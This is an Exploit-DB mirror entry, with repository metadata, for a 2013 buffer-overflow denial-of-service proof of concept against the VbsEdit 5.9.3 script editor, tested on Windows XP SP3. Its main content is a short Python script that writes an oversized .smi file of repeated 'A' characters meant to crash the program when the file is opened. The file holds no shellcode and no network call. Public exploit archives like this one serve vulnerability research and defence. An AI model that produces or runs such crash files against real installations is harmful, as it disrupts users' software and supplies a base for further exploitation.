exploit-db-mirror/exploits/windows/dos/27010.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

17 lines
No EOL
409 B
Text

# Exploit Title: VbsEdit 5.9.3(.smi file handling) Buffer overflow vulnerability
# Date: 22.7.2013
# Exploit Author: d3b4g
# Vendor Homepage:http://www.vbsedit.com/
# Software Link: http://www.vbsedit.com/
# Tested on: Windows XP SP3
# Twitter: @schaba
#!/usr/bin/python
# Tested on: win XPsp3
chars = "A"*90000
crush = "\x41\x41\x41\x41"
file=open('exp.smi','w')
file.write(chars+crush+chars)
file.close()